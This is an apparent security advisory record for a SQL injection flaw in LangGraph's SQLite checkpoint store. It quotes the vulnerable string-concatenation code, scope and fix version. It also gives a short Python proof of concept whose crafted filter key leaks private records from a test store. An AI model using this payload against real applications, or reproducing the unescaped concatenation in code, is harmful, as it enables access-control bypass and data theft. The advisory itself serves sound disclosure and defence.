GHSA-7p73-8jqx-23r8
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7p73-8jqx-23r8
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-7p73-8jqx-23r8/GHSA-7p73-8jqx-23r8.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-7p73-8jqx-23r8
- Aliases
- Published
- 2025-10-29T22:21:43Z
- Modified
- 2025-10-29T22:39:04.123458Z
- Severity
-
- 7.3 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N CVSS Calculator
- Summary
- LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore
- Details
-
Summary
LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.
Details
<code>/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py</code>
The key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.
filter_conditions.append( "json_extract(value, '$." + key # <-- Directly concatenated, no escaping! + "') = '" + value.replace("'", "''") # <-- Only value is escaped + "'" )Who is affected
This issue affects only developers or projects that directly use the
checkpoint-sqlitestore.An application is vulnerable only if it: 1. Instantiates the
SqliteStorefrom thecheckpoint-sqlitepackage, and 2. Builds thefilterargument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.
Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
#!/usr/bin/env python3 """Minimal SQLite Key Injection POC for LangGraph""" from langgraph.store.sqlite import SqliteStore # Create store with test data with SqliteStore.from_conn_string(":memory:") as store: store.setup() # Add public and private documents store.put(("docs",), "public", {"access": "public", "data": "public info"}) store.put(("docs",), "private", {"access": "private", "data": "secret", "password": "123"}) # Normal query - returns 1 public document normal = store.search(("docs",), filter={"access": "public"}) print(f"Normal query: {len(normal)} docs") # SQL injection via malicious key malicious_key = "access') = 'public' OR '1'='1' OR json_extract(value, '$." injected = store.search(("docs",), filter={malicious_key: "dummy"}) print(f"Injected query: {len(injected)} docs") for doc in injected: if doc.value.get("access") == "private": print(f"LEAKED: {doc.value}") - Database specific
{ "severity": "HIGH", "cwe_ids": [ "CWE-89" ], "github_reviewed_at": "2025-10-29T22:21:43Z", "nvd_published_at": "2025-10-29T19:15:39Z", "github_reviewed": true }- References
Affected packages
PyPI / langgraph-checkpoint-sqlite
Package
- Name
- langgraph-checkpoint-sqlite
- View open source insights on deps.dev
- Purl
- pkg:pypi/langgraph-checkpoint-sqlite
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed2.0.11